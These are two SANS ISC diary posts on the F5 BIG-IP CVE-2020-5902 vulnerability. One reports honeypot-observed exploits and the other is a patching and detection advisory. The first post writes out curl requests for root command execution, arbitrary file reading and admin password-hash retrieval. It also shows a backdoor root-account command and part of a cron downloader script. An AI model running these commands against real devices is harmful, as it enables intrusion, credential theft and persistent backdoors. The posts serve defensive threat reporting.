Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits

Published: 2020-07-06
Last Updated: 2020-07-07 16:29:52 UTC
by Johannes Ullrich (Version: 1)
2 comment(s)

Our honeypots have been busy collecting exploit attempts for CVE-2020-5902, the F5 Networks BigIP vulnerability patched last week. Most of the exploits can be considered recognizance. We only saw one working exploit installing a backdoor. Badpackets reported seeing a DDoS bot being installed. 

Thanks to Renato for creating a partial map of the IPs hitting our honeypot so far:

The simplest way to achieve limited command execution is the use of BigIP command-line interface commands. But the function is a bit limited. However, to achieve full-featured command execution, it is possible to just create an alias that points to "bash". 

The result is full code execution in three steps (these requests can us POST or GET. I am using GET here to make them easier to display):

1. Create an "alias" to map the "list" command to "bash"

curl ';/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'


2. Write a file to /tmp with the command to be executed

curl ';/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'

[several empty lines as output]

3. Use the alias to execute the command.

curl ';/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'

{"error":"","output":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}

4. Optionally: remove the alias.



If you do not need code execution, you can also use "Step 2" to write files, or you can just read arbitrary files in one step using:

curl -k ';/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release'

{"output":"BIG-IP release (Final)\n"}

Instead of defining an alias, the technique in step '1' can also be used to execute BigIP CLI command directly, for example, to retrieve password hashes (note this only work if the alias is not defined):

curl ';/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

{"error":"","output":"auth user admin {\n    description \"Admin User\"\n    encrypted-password $6$oeE7u1cp$5cOu9tYnEiXYx\/6UuyOTfgJw5nUgXnetzipHdcX7oRc3xwehAFdQGmhzocud3CGH6MYZgqLGb8u6KiITWBsHi\/\n    partition Common\n    partition-access {\n        all-partitions {\n            role admin\n        }\n    }\n    shell none\n}\n"}

Most of the commands I have seen so far are "id", "ls" and retrieving files like "/etc/paswd" and the BigIP license file. More interesting commands:

* Adding a backdoor root account:

tmsh create auth user f5admin password getrektdotcom partition-access add { all-partitions { role admin } } shell bash

* Adding a backdoor cron job:


which retrieves:

ulimit -n 65535
rm -f /etc/

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
if [ -s /usr/bin/wget ]; then
  LDR="wget -q -O -"

crontab -l | grep -e "" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
    crontab -l 2>/dev/null
    echo "* * * * * $LDR | sh > /dev/null 2>&1"
  ) | crontab -

this will check the URL once a minute for updates via cron. So far, I have not seen any other scripts return. Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site.

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

Keywords: bigip cve20205902 f5
2 comment(s)

CVE-2020-5902: F5 BIG-IP RCE Vulnerability

Published: 2020-07-06
Last Updated: 2020-07-06 11:06:38 UTC
by Didier Stevens (Version: 1)
1 comment(s)

A remote code execution vulnerability CVE-2020-5902 in F5's BIG-IP with CVSS score 10 is actively exploited.

Vulnerable versions are:

  • 11.6.1-
  • 12.1.0-
  • 13.1.0-
  • 14.1.0-
  • 15.0.0-

A directory traversal in the Traffic Management User Interface (TMUI) allows upload and execution of scripts (as root) by unauthenticated attackers.

F5 has released patched versions:


F5's KB article K52145254: TMUI RCE vulnerability CVE-2020-5902.

We have observed Internet scans for this vulnerability. Remark that an attack over the Internet requires that F5's BIG-IP control plane is exposed to the Internet (there are 8400+ F5 systems on the Internet according to Shodan).

Several exploits and a Metasploit module for this vulnerability are public.

There is also a sigma rule and an nmap script (remark: not released by nmap).

We recommend to patch this vulnerability immediately if you expose the TMUI to the Internet, and if you can not do that, remove direct access to the TMUI from the Internet if you expose it.

In any case, go over your logs to identify exploitation attempts (F5 published the KB July 1st, and first exploitation attempts on te Internet were observed starting July 3rd): look for "..;" in the URLs. If you use grep (or another tool with regular expressions) to search through your logs, remember that . matches any character: use a fixed string (option -F in grep).

And let me close with Johannes closing remark on today's StormCast: "... certainly make sure that the management plane is not exposed to the public Internet, who knows when the next vulnerability in this feature will be found!"

Didier Stevens
Senior handler
Microsoft MVP

1 comment(s)
Diary Archives